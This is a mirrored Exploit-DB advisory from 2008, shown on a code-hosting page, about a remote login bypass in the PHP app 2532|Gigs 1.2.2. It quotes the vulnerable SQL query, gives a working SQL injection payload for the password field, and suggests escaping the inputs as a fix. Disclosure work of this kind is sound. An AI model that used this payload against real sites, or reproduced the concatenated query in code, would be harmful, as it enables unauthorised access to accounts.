bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/7511.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

30 lines
No EOL
1.3 KiB
Text
Raw Blame History

/* ------------------------------------------------------------------------------------------------
* 2532|Gigs 1.2.2 Stable Remote Login Bypass Vulnerability
* ------------------------------------------------------------------------------------------------
* by athos - staker[at]hotmail[dot]it
* http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1
* ------------------------------------------------------------------------------------------------
* File Vuln checkuser.php
*
* 16. $username = $_POST['username'];
* 17. $password = $_POST['password'];
* ...
* 41. $query = "SELECT * FROM $dbt_users WHERE username = '$username' AND password = '$password'" ;
* 42. $result = mysql_query($query) or die ( "Error in query: $query. " . mysql_error() );
* ------------------------------------------------------------------------------------------------
* Exploit
*
* http://[host]/[path]/index.php?id=login
*
* Username: [username]
* Password: [' or 1=1--]
* ------------------------------------------------------------------------------------------------
* Fix (Examples)
*
* $username = mysql_real_escape_string($_POST['username']);
* $password = mysql_real_escape_string($_POST['password']);
*
* ------------------------------------------------------------------------------------------------
*/
# milw0rm.com [2008-12-18]
Reference in a new issue View git blame Copy permalink